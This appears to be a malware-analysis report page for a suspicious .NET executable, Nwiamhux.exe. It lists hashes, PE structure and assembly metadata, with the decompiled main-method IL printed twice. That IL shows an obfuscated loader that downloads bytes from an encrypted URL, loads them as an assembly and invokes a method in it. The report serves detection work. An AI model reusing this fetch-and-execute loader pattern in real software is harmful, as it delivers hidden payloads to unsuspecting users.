Suspicious
Suspect

5e9888d5fcd65f2c3bfdd37a73bfe167

PE Executable
|
MD5: 5e9888d5fcd65f2c3bfdd37a73bfe167
|
Size: 53.25 KB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Medium

Hash
 Hash Value
MD5
5e9888d5fcd65f2c3bfdd37a73bfe167
Sha1
7d10c1cd5a02e769db4f9f764f52a78646d7634c
Sha256
5b2968c2f95f948e2a93b6e4ccfb7810f2581ebb3c6604f2ac9e625e4001d529
Sha384
18975dfad74e1cc01801062a2dd53962ce66eff64cc54098a295d302614e331998711856f542708e3242c0805a225e31
Sha512
7f83844feb5c94e29ad2681847ebb40edac151407aad0c08bf82bce7653af721ec38a7b70cb42ca06bacb69f2dcebdd7c18dfde36cdfd7f5958b208b1a6221ef
SSDeep
1536:aZ8DLcF7a6t3f0WHl8C9XBmzZXPyYUGz:aZ8nclfFl8CylfyW
TLSH
B2334A0CAB9D6523D37D4D7E98B21314A3BAE2E37143E36FACC095A81893BD816117D7

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
5e9888d5fcd65f2c3bfdd37a73bfe167
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
lyQlP
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

Nwiamhux.exe
Full Name

Nwiamhux.exe
EntryPoint

System.Void  ::()
Scope Name

Nwiamhux.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Nwiamhux
Assembly Version

1.0.5128.16446
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.6
Total Strings

11
Main Method

System.Void  ::()
Main IL Instruction Count

144
Main IL

ldnull <null> stloc.0 <null> br.s IL_0045: br.s IL_0004 nop <null> nop <null> ldc.i4 3072 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) leave.s IL_0015: newobj System.Void System.Net.WebClient::.ctor() pop <null> leave.s IL_0015: newobj System.Void System.Net.WebClient::.ctor() newobj System.Void System.Net.WebClient::.ctor() stloc.1 <null> ldloc.1 <null> ldc.i4 386167534 call System.String d::a(System.Int32) callvirt System.Byte[] System.Net.WebClient::DownloadData(System.String) stloc.0 <null> leave.s IL_0040: leave.s IL_0047 ldloc.1 <null> brfalse.s IL_0034: ldc.i4.1 ldc.i4.0 <null> br.s IL_0037: brtrue.s IL_003F ldc.i4.1 <null> br.s IL_0037: brtrue.s IL_003F brtrue.s IL_003F: endfinally ldloc.1 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0047: ldloc.0 pop <null> leave.s IL_0045: br.s IL_0004 br.s IL_0004: nop ldloc.0 <null> ldnull <null> cgt.un <null> stloc.s V_5 ldloc.s V_5 brfalse.s IL_0054: ldc.i4.1 ldc.i4.0 <null> br.s IL_0057: brtrue IL_0161 ldc.i4.1 <null> br.s IL_0057: brtrue IL_0161 brtrue IL_0161: ret br.s IL_008F: ldc.i4.s 99 ldloc.s V_9 ldc.i4.s 89 xor <null> stloc.s V_9 br.s IL_0084: ldc.i4.s 91 ldloc.s V_10 ldc.i4.s 87 xor <null> stloc.s V_10 ldloc.s V_10 ldc.i4.s 99 add <null> switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s 91 call System.Int32 n/c::b(System.Int32) stloc.s V_10 br.s IL_0067: ldloc.s V_10 ldc.i4.s 99 call System.Int32 w::ac(System.Int32) stloc.s V_9 ldc.i4.s -56 stloc.s V_10 br.s IL_0067: ldloc.s V_10 ldloc.s V_9 ldc.i4.s 88 sub <null> switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s -54 stloc.s V_10 br.s IL_0067: ldloc.s V_10 br.s IL_005E: ldloc.s V_9 ldloc.s V_6 brfalse.s IL_00ED: ldc.i4.1 ldc.i4.2 <null> stloc.s V_9 br.s IL_005E: ldloc.s V_9 ldloc.0 <null> call System.Byte[]  ::a(System.Byte[]) stloc.2 <null> ldc.i4.3 <null> stloc.s V_9 br.s IL_005E: ldloc.s V_9 ldloc.2 <null> ldlen <null> ldc.i4.0 <null> cgt.un <null> stloc.s V_6 ldc.i4.s 84 call System.Int32 w::ac(System.Int32) stloc.s V_9 br IL_005E: ldloc.s V_9 ldc.i4.0 <null> br.s IL_00F0: brtrue IL_0161 ldc.i4.1 <null> br.s IL_00F0: brtrue IL_0161 brtrue IL_0161: ret ldloc.2 <null> call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.3 <null> ldloc.3 <null> callvirt System.String System.Reflection.Assembly::get_CodeBase() call System.Boolean System.String::IsNullOrWhiteSpace(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_7 ldloc.s V_7 brfalse.s IL_0113: ldc.i4.1 ldc.i4.0 <null> br.s IL_0116: brtrue.s IL_0161 ldc.i4.1 <null> br.s IL_0116: brtrue.s IL_0161 brtrue.s IL_0161: ret ldloc.3 <null> ldc.i4 386167433 call System.String d::a(System.Int32) callvirt System.Type System.Reflection.Assembly::GetType(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.String System.Type::get_FullName() call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_8 ldloc.s V_8 brfalse.s IL_0142: ldc.i4.1 ldc.i4.0 <null> br.s IL_0145: brtrue.s IL_0161 ldc.i4.1 <null> br.s IL_0145: brtrue.s IL_0161 brtrue.s IL_0161: ret ldloc.s V_4 ldc.i4 386167389 call System.String d::a(System.Int32) ldc.i4 256 ldnull <null> ldnull <null> ldnull <null> callvirt System.Object System.Type::InvokeMember(System.String,System.Reflection.BindingFlags,System.Reflection.Binder,System.Object,System.Object[]) pop <null> ret <null>
Module Name

Nwiamhux.exe
Full Name

Nwiamhux.exe
EntryPoint

System.Void  ::()
Scope Name

Nwiamhux.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Nwiamhux
Assembly Version

1.0.5128.16446
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.6
Total Strings

11
Main Method

System.Void  ::()
Main IL Instruction Count

144
Main IL

ldnull <null> stloc.0 <null> br.s IL_0045: br.s IL_0004 nop <null> nop <null> ldc.i4 3072 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) leave.s IL_0015: newobj System.Void System.Net.WebClient::.ctor() pop <null> leave.s IL_0015: newobj System.Void System.Net.WebClient::.ctor() newobj System.Void System.Net.WebClient::.ctor() stloc.1 <null> ldloc.1 <null> ldc.i4 386167534 call System.String d::a(System.Int32) callvirt System.Byte[] System.Net.WebClient::DownloadData(System.String) stloc.0 <null> leave.s IL_0040: leave.s IL_0047 ldloc.1 <null> brfalse.s IL_0034: ldc.i4.1 ldc.i4.0 <null> br.s IL_0037: brtrue.s IL_003F ldc.i4.1 <null> br.s IL_0037: brtrue.s IL_003F brtrue.s IL_003F: endfinally ldloc.1 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0047: ldloc.0 pop <null> leave.s IL_0045: br.s IL_0004 br.s IL_0004: nop ldloc.0 <null> ldnull <null> cgt.un <null> stloc.s V_5 ldloc.s V_5 brfalse.s IL_0054: ldc.i4.1 ldc.i4.0 <null> br.s IL_0057: brtrue IL_0161 ldc.i4.1 <null> br.s IL_0057: brtrue IL_0161 brtrue IL_0161: ret br.s IL_008F: ldc.i4.s 99 ldloc.s V_9 ldc.i4.s 89 xor <null> stloc.s V_9 br.s IL_0084: ldc.i4.s 91 ldloc.s V_10 ldc.i4.s 87 xor <null> stloc.s V_10 ldloc.s V_10 ldc.i4.s 99 add <null> switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s 91 call System.Int32 n/c::b(System.Int32) stloc.s V_10 br.s IL_0067: ldloc.s V_10 ldc.i4.s 99 call System.Int32 w::ac(System.Int32) stloc.s V_9 ldc.i4.s -56 stloc.s V_10 br.s IL_0067: ldloc.s V_10 ldloc.s V_9 ldc.i4.s 88 sub <null> switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s -54 stloc.s V_10 br.s IL_0067: ldloc.s V_10 br.s IL_005E: ldloc.s V_9 ldloc.s V_6 brfalse.s IL_00ED: ldc.i4.1 ldc.i4.2 <null> stloc.s V_9 br.s IL_005E: ldloc.s V_9 ldloc.0 <null> call System.Byte[]  ::a(System.Byte[]) stloc.2 <null> ldc.i4.3 <null> stloc.s V_9 br.s IL_005E: ldloc.s V_9 ldloc.2 <null> ldlen <null> ldc.i4.0 <null> cgt.un <null> stloc.s V_6 ldc.i4.s 84 call System.Int32 w::ac(System.Int32) stloc.s V_9 br IL_005E: ldloc.s V_9 ldc.i4.0 <null> br.s IL_00F0: brtrue IL_0161 ldc.i4.1 <null> br.s IL_00F0: brtrue IL_0161 brtrue IL_0161: ret ldloc.2 <null> call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.3 <null> ldloc.3 <null> callvirt System.String System.Reflection.Assembly::get_CodeBase() call System.Boolean System.String::IsNullOrWhiteSpace(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_7 ldloc.s V_7 brfalse.s IL_0113: ldc.i4.1 ldc.i4.0 <null> br.s IL_0116: brtrue.s IL_0161 ldc.i4.1 <null> br.s IL_0116: brtrue.s IL_0161 brtrue.s IL_0161: ret ldloc.3 <null> ldc.i4 386167433 call System.String d::a(System.Int32) callvirt System.Type System.Reflection.Assembly::GetType(System.String) stloc.s V_4 ldloc.s V_4 callvirt System.String System.Type::get_FullName() call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_8 ldloc.s V_8 brfalse.s IL_0142: ldc.i4.1 ldc.i4.0 <null> br.s IL_0145: brtrue.s IL_0161 ldc.i4.1 <null> br.s IL_0145: brtrue.s IL_0161 brtrue.s IL_0161: ret ldloc.s V_4 ldc.i4 386167389 call System.String d::a(System.Int32) ldc.i4 256 ldnull <null> ldnull <null> ldnull <null> callvirt System.Object System.Type::InvokeMember(System.String,System.Reflection.BindingFlags,System.Reflection.Binder,System.Object,System.Object[]) pop <null> ret <null>
5e9888d5fcd65f2c3bfdd37a73bfe167 (53.25 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙